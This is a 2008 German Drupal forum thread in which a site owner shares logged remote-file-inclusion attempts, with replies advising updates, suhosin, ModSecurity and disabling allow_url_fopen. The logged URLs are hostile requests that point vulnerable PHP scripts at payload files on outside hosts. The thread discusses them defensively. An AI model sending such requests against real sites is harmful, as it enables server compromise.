Startseite
  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche
Startseite › Forum › Drupalcenter.de › Allgemeines zu Drupal ›

Info zu "Hackversuchen"

Eingetragen von Jim (25)
am 15.10.2008 - 11:58 Uhr in
  • Allgemeines zu Drupal
  • Drupal 5.x oder neuer

Hallo zusammen,

wie ich gerade im Log festgestellt habe versuchen seit ein paar Tagen irgendwelche Trollos meine Webseite zu "hacken". Vielleicht sind die folgenden Infos ja für den ein oder anderen User auch von Interesse. Hier mal die entsprechenden Infos aus dem Log (Seite nicht gefunden) von Drupal (Auszug):

IP: 200.199.75.194
http://meine_Domain//cgi/browser/methodTable.php?cfg[AmfphpPath]=http://www.severo-zapad.ru//i/alb_id.txt?

IP: 200.199.75.194
http://meine_Domain//cgi/browser/methodTable.php?cfg[AmfphpPath]=http://www.severo-zapad.ru//i/alb_id.txt?

IP: 203.22.204.202
http://meine_Domain//cgi/browser/ServiceBrowser.php?_basedir=http://www....?

IP: 62.149.238.228
http://meine_Domain/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/ixan_xdet/safe.txt?

Da bei mir noch die Version 5.7 eingesetzt wird, werd' ich jetzt wohl erstmal auf die aktuelle Version 5.11 updaten, in der Hoffnung das dadurch schon mal wieder etwas mehr Sicherheit vorhanden ist. Ein sperren der IPs (bzw. ganzer IP-Bereiche) per Zugriffsrechte oder htaccess macht wohl keinen Sinn, da diese Trollos über IPs aus Südamerika, Russland, USA usw. kommen.

Falls jemand noch irgendwelche Tipps oder Empfehlungen bzgl. der "Hackversuche" hat, dann immer her damit.

Gruß Jim

‹ Link zu PDF-Datei im Menü? URL Rewrite funktioniert nicht nach Datenbankumzug ›
  • Anmelden oder Registrieren um Kommentare zu schreiben

Das ist ganz normal. Du

Eingetragen von Alexander Langer (3416)
am 15.10.2008 - 12:10 Uhr

Das ist ganz normal. Du würdest dich wundern was am Tag so alles auf einem Server und allen seinen Diensten versucht wird.

Neben der Aktualisierung der Webanwendung kannst du beim Shared Hosting herzlich wenig machen. Als Server-Admin hast du natürlich viel mehr Möglichkeiten Vorsorge zu treffen, um es Hackern so schwierig wie möglich zu machen. Letzten Endes bleibt Sicherheit aber immer relativ.

--
Webseiter

  • Anmelden oder Registrieren um Kommentare zu schreiben

Hallo Alexander, Alexander

Eingetragen von Jim (25)
am 19.10.2008 - 14:45 Uhr

Hallo Alexander,

Alexander Langer schrieb

Das ist ganz normal. Du würdest dich wundern was am Tag so alles auf einem Server und allen seinen Diensten versucht wird.

jo - wem sagst Du das: Ich hab' auch noch einen eigenen Server mit div. Seiten und Foren im Einsatz und auch da ist das immer ein "Hase und Igel Spiel".

Naja - hab' jetzt eben mal das Update auf die Version 5.11 gemacht und hoffe das ich damit etwas mehr an Sicherheit gewonnen habe.

Gruß Jim

  • Anmelden oder Registrieren um Kommentare zu schreiben

Wenn du einen eigenen Server

Eingetragen von Alexander Langer (3416)
am 19.10.2008 - 15:13 Uhr

Wenn du einen eigenen Server hast, kannst du ja PHP mit suhosin Patch einsetzen und den Apache mit ModSecurity erweitern, etc.

--
Webseiter

  • Anmelden oder Registrieren um Kommentare zu schreiben

Alexander Langer

Eingetragen von Jim (25)
am 19.10.2008 - 17:08 Uhr
Alexander Langer schrieb

Wenn du einen eigenen Server hast, kannst du ja PHP mit suhosin Patch einsetzen und den Apache mit ModSecurity erweitern, etc.

Ne - wie Du vorher schon richtig getippt hast läuft die Drupal-Seite, um die's hier geht, auf einem gesharten Server und da kann ich natürlich nichts weiter machen. Ausser ein paar Dinge per php.ini, wie z.B. allow_url_fopen = off

Gruß Jim

  • Anmelden oder Registrieren um Kommentare zu schreiben

Benutzeranmeldung

  • Registrieren
  • Neues Passwort anfordern

Aktive Forenthemen

  • Drupal CMS installieren
  • [erledigt]MP3 in Drupal 10 einbinden
  • (gelöst)Drupal 11 installieren
  • Titel ausblenden
  • Ich brauche dringen Hilfe zu Updates oder ggf. wwie geht Composer?
  • Dynamische Ansicht von Seiteninhalt (als Tabelle?)
  • Vergabe von Berechtigungen für bestimmte Rollen; mir fehlt der Haken bzw. das „Veröffentlicht“
  • Medien und andere Daten mit Feeds von Drupal 7 auf Drupal 10 migrieren
  • Rolle erstellen nicht zu finden
  • für drupal11 ein Slider Modul
  • [gelöst] W3CSS Paragraphs Views
  • Drupal 11 neu aufsetzen und Bereiche aus 10 importieren
Weiter

Neue Kommentare

  • Verwende doch das Tag dafür,
    vor 1 Woche 3 Stunden
  • Guckst du hier: step by step
    vor 6 Tagen 16 Stunden
  • Guckst du hier: step by step
    vor 6 Tagen 16 Stunden
  • Ich habe ja keine Angst vor
    vor 2 Wochen 2 Tagen
  • Ist grundsätzlichmachbar – aber nichts für „einfach mal schnell“
    vor 2 Wochen 4 Tagen
  • Vielen Dank erst einmal, aber
    vor 2 Wochen 6 Tagen
  • Du hast die "Trusted host
    vor 2 Wochen 6 Tagen
  • Bitte genauer den aktuellen Lösungs-Ansatz beschreiben
    vor 4 Wochen 5 Tagen
  • Git und rsync sind die wichtigsten Werkzeuge
    vor 5 Wochen 1 Tag
  • Arrrrg. Nix Tabelle :-D /*
    vor 9 Wochen 4 Tagen

Statistik

Beiträge im Forum: 250284
Registrierte User: 20500

Neue User:

  • RandallFloop
  • Inga GuAph
  • Robertolix

» Alle User anzeigen

User nach Punkten sortiert:
wla9464
stBorchert6003
quiptime4972
Tobias Bähr4019
bv3924
ronald3857
md3717
Thoor3678
Alexander Langer3416
Exterior2903
» User nach Punkten
Zur Zeit sind 0 User und 21 Gäste online.

Hauptmenü

  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche

Quicklinks I

  • Infos
  • Drupal Showcase
  • Installation
  • Update
  • Forum
  • Team
  • Verhaltensregeln

Quicklinks II

  • Drupal Jobs
  • FAQ
  • Drupal-Kochbuch
  • Best Practice - Drupal Sites - Guidelines
  • Drupal How To's

Quicklinks III

  • Tipps & Tricks
  • Drupal Theme System
  • Theme Handbuch
  • Leitfaden zur Entwicklung von Modulen

RSS & Twitter

  • Drupal Planet deutsch
  • RSS Feed News
  • RSS Feed Planet
  • Twitter Drupalcenter
Drupalcenter Team | Impressum & Datenschutz | Kontakt
Angetrieben von Drupal | Drupal is a registered trademark of Dries Buytaert.
Drupal Initiative - Drupal Association